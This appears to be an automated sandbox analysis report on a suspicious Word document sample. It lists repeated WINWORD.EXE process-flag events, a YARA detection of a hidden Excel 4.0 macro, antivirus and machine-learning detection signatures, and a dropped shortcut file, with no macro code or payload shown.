Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: 1118_8732615.doc, type: SAMPLE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 319766 Sample: 1118_8732615.doc Startdate: 18/11/2020 Architecture: WINDOWS Score: 64 10 Multi AV Scanner detection for submitted file 2->10 12 Machine Learning detection for sample 2->12 14 Document contains an embedded VBA macro with suspicious strings 2->14 16 2 other signatures 2->16 5 WINWORD.EXE 40 35 2->5         started        process3 file4 8 C:\Users\user\...\1118_8732615.doc.LNK, MS 5->8 dropped
No contacted IP infos